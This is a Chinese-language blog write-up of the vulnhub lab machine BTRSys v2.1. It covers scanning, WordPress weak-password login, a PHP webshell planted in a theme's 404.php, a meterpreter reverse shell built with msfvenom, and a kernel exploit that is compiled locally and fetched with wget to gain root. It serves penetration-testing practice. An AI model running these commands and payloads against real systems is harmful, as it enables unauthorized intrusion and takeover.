wait's〔三生石畔〕 善良人在追求中纵然迷惘,却终将意识到有一条正途。—— 歌德
【渗透测试-靶场】No.3- BTRSys2 (vulnhub)渗透测试
发表于: | 分类: 安全测试 | 评论:0 | 阅读: 2361

一、前言

主要利用方式:wordpress账号密码破解+PHP马反弹shell+系统内核低版本提权

二、靶机信息

靶场: vulnhub.com
靶机名称: BTRSys:v2.1

难度: 中等
发布时间: 2017年7月31日
下载地址:https://www.vulnhub.com/entry/btrsys-v21,196/
备注:本次靶机,坑略微有点多,需要谨慎。
         php反弹shell 有很多方式,但shell是否能用,需要进一步探索。

三、虚拟机配置

这次采用的网络连接模式依然是NAT模式、DHCP服务:启用、IP地址:自动分配

四、信息收集

1、探测靶机ip地址

└─$ sudo nmap -p- 192.168.169.148

1.png

2、探测靶机ip端口开放

└─$ sudo nmap -p- 192.168.169.148

2.png

3、nmap探测各端口的开放服务及服务信息

└─$ sudo nmap -p21,22,80 -sV -A 192.168.169.148 

3.png

21port:ftp服务默认开启端口(存在ftp匿名登录漏洞)
22port:ssh远程登陆端口
80port:超文本传输协议开放端口

4、匿名登录并查看ftp是否存在敏感信息或者隐藏文件等

└─$ ftp 192.168.169.148
ftp> ls -la

4.png

5、21、22端口无法利用,只能通过80端口,扫描目录

└─$ dirsearch -u 192.168.169.148 

5.png
6、通过扫描到的上传连接访问,收集到database 有可能和“Lepton”有关联,但也没有其他可用信息

 http://192.168.169.148/upload/

6.png
7、常规信息收集bobots文件,可以发现存在一个文件夹:wordpress。

 http://192.168.169.148/robots.txt

7.png
8、通过常规信息收集bobots文件以及目录扫描皆发现 /wordpress/

http://192.168.169.148/wordpress/

8.png

9、通过常规目录扫描以及wordpress盲猜后台,访问/wordpress/wp-login.php

http://192.168.169.148/wordpress/wp-login.php

9.png

10、wordpress站点,可使用wpscan工具进行探索用户,可发现存在: btrisk、admin 两用户

http://192.168.169.148/wordpress/wp-login.php

10.png

五、漏洞利用

11、经过尝试,弱口令成功登录。(PS:这个地方依然可以用wpscan 指定用户名及密码本进行爆破)

(username=admin passwd=admin)

11-1.png
11-2.png
12、写入一句话木马,Update File 保存成功, 并访问,蚁剑连接成功

http://192.168.169.148/wordpress/wp-content/themes/twentyfourteen/404.php

12-1.png
12-2.png
13、利用PHP进行反弹shell, 通过写入并访问shell页面,传参使PHP进行加载并反弹shell

参考连接:https://www.freesion.com/article/3134134527/
http://192.168.169.148/wordpress/wp-content/themes/twentyfourteen/404.php  

13.png
14、使用hackbar进行post请求(hackbar2.1.3是免费版本 )
14.png
15、开启监听, PHP进行加载并反弹shell,但shell模式经过验证,暂未找到可进行升级tty交互式的方式
15-1.png
15-2.png

16、利用msfvenom 生成webshell 并进行反弹shell
使用msfvenom命令来生成一个WEBSHELL木马,命令如下。

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.205.127 LPORT=4444-f raw >./shell.php

16.png

17、生成木马之后,把木马里的PHP代码,复制粘贴在wordpress的404文件里中,如下图。
17.png

18、开启监听,使用msfconsole工具,使用命令如下。

  msfconsole

18.png

19、按照如下图设置ip地址,设置payload

msf6 > use exploit/multi/handler                                                                                                         
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set LHOST 192.168.169.129
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

19.png

20、开启监听,再去访问刚才写入在404模板里面的地址,访问shell文件,成功反弹meterpreter。

URL中访问:http://192.168.169.148/wordpress/wp-content/themes/twentyfourteen/404.php,

20.png

六.提权

21、利用漏洞提权,输入shell进入控制台,然后利用python tty提升交互式。

python3 -c "import pty; pty.spawn('/bin/bash')"
21.png

22、输入:pwd,id,whoami,uname -r,发现有系统层面的漏洞,内核版本是4.4.0
22.png

23、在KALI里面使用searchsploit命令来查找内核低版本漏洞。使用41458来提权。
23.png

24、把文件拷贝到桌面

└─$ searchsploit -m linux/local/41458.c 

24.png

25、谨防靶机无gcc工具,先在kali本机进行编译文件

└─$ gcc -o exploit 41458.c

25.png

26、本机开启web服务,留着靶机来本机下载exploit文件

└─$ python -m http.server 

26.png

27、本机开启web服务,留着靶机来本机下载exploit文件

www-data@ubuntu:/tmp$ wget http://192.168.169.129:8000/exploit

27.png

28、执行exploit文件,发现无权限,赋777权限,再执行

www-data@ubuntu:/tmp$ ./exploit
www-data@ubuntu:/tmp$ chmod 777 exploit

28.png

最终成功的拿到了root权限!

添加新评论

TOP